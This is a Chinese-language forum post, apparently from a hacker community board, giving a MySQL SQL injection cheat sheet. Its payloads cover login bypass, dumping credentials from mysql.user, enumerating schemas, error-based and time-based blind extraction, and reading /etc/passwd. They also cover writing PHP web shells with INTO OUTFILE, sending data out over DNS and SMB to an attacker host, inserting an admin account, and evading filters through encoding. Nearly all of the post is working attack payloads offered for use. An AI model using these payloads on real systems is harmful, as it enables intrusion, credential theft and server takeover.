搜索
查看: 1524|回复: 0

数据库的一些注入技巧-mysql

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2019-11-6 20:07:45 | 显示全部楼层 |阅读模式
默认数据库
Mysql
需要root权限
information_schema
版本5及更高版本可用

尝试注入
False表示查询无效(mysql语句错误/网页内容为空/与原页面不一致)
True表示查询有效(网页内容与原先一致)

字符串型
漏洞语句:
select * from table where id = ‘1’;

'
False
''
True
"
False
""
True
\
False
\\
True

例子:

SELECT * FROMArticles WHERE id = '1''';
SELECT 1 FROM dualWHERE 1 = '1'''''''''''''UNION SELECT '2';

数字型
漏洞语句:
SELECT * FROM Table WHERE id = 1;

AND 1  True
AND 0  False
AND true   True
AND false  False
1-false    如果有漏洞则返回1
1-true如果有漏洞则返回0
1*56   如果有漏洞则返回56
1*56        如果没漏洞则返回1

例子:
SELECT * FROM UsersWHERE id = 3-2;

笔记:

true 等同于 1.
false等同于 0.



登录口
漏洞语句:
SELECT * FROM Table WHERE username = '';

' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+

例子:
SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';

注释查询
以下内容可用于注释掉后面的其他语句
#
/*
-- -
;%00
`

例子:

SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password ='';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

获取版本
VERSION()
@@VERSION
@@GLOBAL.VERSION

例子:
SELECT * FROM Users WHERE id = '1' ANDMID(VERSION(),1,1) = '5';

内联注释
例子:

漏洞语句:
SELECT * FROM Users limit 1,{INJECTION POINT};

/*!50094eaea*/;
False – 数据库版本大于等于 5.00.94
/*!50096eaea*/;
True -   数据库版本小于5.00.96
/*!50095eaea*/;
False -  数据库版本等于5.00.95
数据库凭证
Table
mysql.user
Columns
user, password
Current  User
user(), current_user(), current_user, system_user(),  session_user()


例子:

SELECT current_user;
SELECT CONCAT_WS(0x3A, user, password)FROM mysql.user WHERE user = 'root'-- (Privileged)


密码可以解密



数据库名称
Tables
information_schema.schemata, mysql.db
Columns
schema_name, db
Current  DB
database(), schema()

例子:
SELECT database();
SELECT schema_name FROM information_schema.schemata;
SELECT DISTINCT(db) FROM mysql.db;-- (Privileged)



数据库主机名
例子:
SELECT @@hostname;

获取表和列确定列数通过group/order
GROUP/ORDER BY n+1;
笔记:
不断增加数字,直到页面错误

例子:

漏洞语句:
SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1' ORDER BY 1--+  True
1' ORDER BY 2--+  True
1' ORDER BY 3--+  True
1' ORDER BY 4--+  False
-1' UNION SELECT 1,2,3--+   True 说明存在三列

通过报错(一)
GROUP/ORDER BY 1,2,3,4,5...

例子:
漏洞语句:
SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}'
1' GROUP BY 1,2,3,4,5--+
Unknown column  '4' in 'group statement'
1'  ORDER BY 1,2,3,4,5--+
Unknown column  '4' in 'order clause'
通过报错(二)
SELECT ... INTO var_list, var_list1, var_list2...

例子1:
漏洞语句:
SELECTpermission FROM Users WHERE id = {INJECTION POINT};
-1 UNION SELECT 1 INTO @,@,@
The used SELECT  statements have a different number of columns
-1  UNION SELECT 1 INTO @,@
The used SELECT  statements have a different number of columns
-1  UNION SELECT 1 INTO @
No error means  query uses 1 column
例子 2:
漏洞语句:
SELECT username,permission FROM Users limit 1,{INJECTION POINT};
1 INTO @,@,@
The used SELECT  statements have a different number of columns
1  INTO @,@
No error means  query uses 2 columns
通过报错(三)
AND (SELECT * FROM SOME_EXISTING_TABLE) = 1
例子:
漏洞语句:
SELECT permission FROMUsers WHERE id = {INJECTION POINT};
1 AND (SELECT * FROM Users) = 1
Operand should  contain 3 column(s)
检索表内容联合查询
UNION SELECTGROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;

布尔查询
AND SELECT SUBSTR(table_name,1,1)  FROM information_schema.tables > 'A'

报错查询
AND(SELECT COUNT(*) FROM (SELECT  1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM  information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@  GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT  1),!@) HAVING @||MIN(@:=0);
AND  ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM  information_schema.tables LIMIT 1)));-- Available in 5.1.5

检索列内容联合查询
UNION SELECT GROUP_CONCAT(column_name) FROMinformation_schema.columns WHERE table_name = 'tablename'

布尔查询
AND SELECT  SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

报错查询
AND(SELECT COUNT(*)  FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT  column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY  CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@)  HAVING @||MIN(@:=0);
AND ExtractValue(1,  CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT  1)));-- Available in MySQL 5.1.5
AND (1,2,3) =  (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in  MySQL 5.1
AND (SELECT * FROM  (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)
AND (SELECT * FROM  (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING  (SOME_EXISTING_COLUMN)) a)

limit注入
漏洞语句:
SELECT username, permission FROM Users WHEREid = 1;
1 PROCEDURE ANALYSE()
Get the first  column's name
1  LIMIT 1,1 PROCEDURE ANALYSE()
Get the second  column's name
1  LIMIT 2,1 PROCEDURE ANALYSE()
Get the third  column's name


一次检索多个表/列
o    SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM(information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,'[ ',table_schema,' ] >',table_name,' > ',column_name))))x

SELECT * FROM Users WHERE id = '-1' UNION SELECT1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@)FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN(@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' >',column_name))))x), 4--+';

输出为
[ information_schema ] >CHARACTER_SETS >CHARACTER_SET_NAME
[ information_schema ] >CHARACTER_SETS >DEFAULT_COLLATE_NAME
[ information_schema ] >CHARACTER_SETS >DESCRIPTION
[ information_schema ] >CHARACTER_SETS >MAXLEN
[ information_schema ] >COLLATIONS >COLLATION_NAME
[ information_schema ] >COLLATIONS >CHARACTER_SET_NAME
[ information_schema ] >COLLATIONS > ID
[ information_schema ] >COLLATIONS >IS_DEFAULT
[ information_schema ] >COLLATIONS >IS_COMPILED
                                             

SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name,0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROMinformation_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROMinformation_schema.columns


SELECT username FROM Users WHERE id = '-1' UNIONSELECT MID(GROUP_CONCAT(0x3c62723e,0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDERBY (SELECT version FROM information_schema.tables) SEPARATOR0x3c62723e),1,1024) FROM information_schema.columns--+';

输出为
Table: talk_revisions
Column: revid
Table: talk_revisions
Column: userid
Table: talk_revisions
Column: user
Table: talk_projects
Column: priority

从系统列查询信息
SELECT table_name FROM information_schema.columnsWHERE column_name = 'username';

SELECT table_name FROM information_schema.columnsWHERE column_name LIKE '%user%';

SELECT column_name FROMinformation_schema.columns WHERE table_name = 'Users';

SELECT column_name FROMinformation_schema.columns WHERE table_name LIKE '%user%';

不使用单引号
SELECT * FROM Users WHERE username = 0x61646D696E

SELECT * FROM Users WHERE username = CHAR(97,100, 109, 105, 110)
字符串连接
SELECT 'a' 'd' 'mi' 'n';
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');


条件语句
CASE
IF()
IFNULL()
NULLIF()

SELECT IF(1=1, true, false);
SELECT CASE WHEN 1=1 THEN true ELSE false END;

时间判断
SLEEP()
MySQL 5
BENCHMARK()
MySQL 4/5


' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '

权限判断
确定哪个用户具有file权限
ELECT file_priv FROM mysql.user  WHERE user = 'username';
Root privileges  required
MySQL 4/5
SELECT  grantee, is_grantable FROM information_schema.user_privileges WHERE  privilege_type = 'file' AND grantee like '%username%';
No privileges  required
MySQL 5

文件读取
具有file权限的用户可以读取文件
LOAD_FILE()
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE(0x2F6574632F706173737764);

写文件
具有file权限的用户可以写文件

INTOOUTFILE/DUMPFILE


SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';
http://localhost/shell.php?c=cat%20/etc/passwd

SELECT '<? fwrite(fopen($_GET[f], \'w\'),file_get_contents($_GET)); ?>' INTO OUTFILE '/var/www/get.php'

http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt
数据带外DNS
SELECT LOAD_FILE(CONCAT('\\\\foo.',(selectMID(version(),1,1)),'.attacker.com\\'));

SMB
' OR 1=1 INTO OUTFILE'\\\\attacker\\SMBshare\\output.txt
多语句执行
SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTOUsers(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');
SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROMUsers;


内联查询
MySQL允许在感叹号后指定版本号。仅当版本大于或等于指定的版本号时,才执行注释中的语法。

UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null--x*/0,null--+
SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

混淆以下字符可以代替空格
09
0A
0B
0C
0D
A0
20

'%0A%09UNION%0CSELECT%A0NULL%20%23


括号也可以用来避免使用空格
UNION(SELECT(column)FROM(table))

and/or之后可以使用的符号
20
Space
2B
+
2D
-
7E
~
21
!
40
@
SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

利用注释+换行
1'#
AND 0--
UNION# Iam a comment!
SELECT@tmp--
`information_schema`.tables LIMIT 1#

1'%23%0AAND 0--%0AUNION%23I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tablesLIMIT 1%23

VERSION/**/%A0 (/*comment*/)

URL  Encoding
SELECT %74able_%6eame FROM information_schema.tables;
Double  URL Encoding
SELECT %2574able_%256eame FROM information_schema.tables;
Unicode  Encoding
SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid  Hex Encoding (ASP)
SELECT %tab%le_%na%me FROM information_schema.tables;


逃避某些关键字
空格
information_schema . tables
反引号
`information_schema`.`tables`
注释
/*!information_schema.tables*/
其他
information_schema.partitions
information_schema.statistics
information_schema.key_column_usage
information_schema.table_constraints

条件比较
AND , &&
=
:=
BETWEEN ... AND ...
BINARY
&
~
|
^
CASE
DIV
/
<=>
=
>=
>
IS NOT NULL
IS NOT
IS NULL
IS
<<
<=
<
LIKE
-
% or MOD
NOT BETWEEN ... AND ...
!= , <>
NOT LIKE
NOT REGEXP
NOT , !
|| , OR
+
REGEXP
>>
RLIKE
SOUNDS LIKE
*
-
XOR


过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表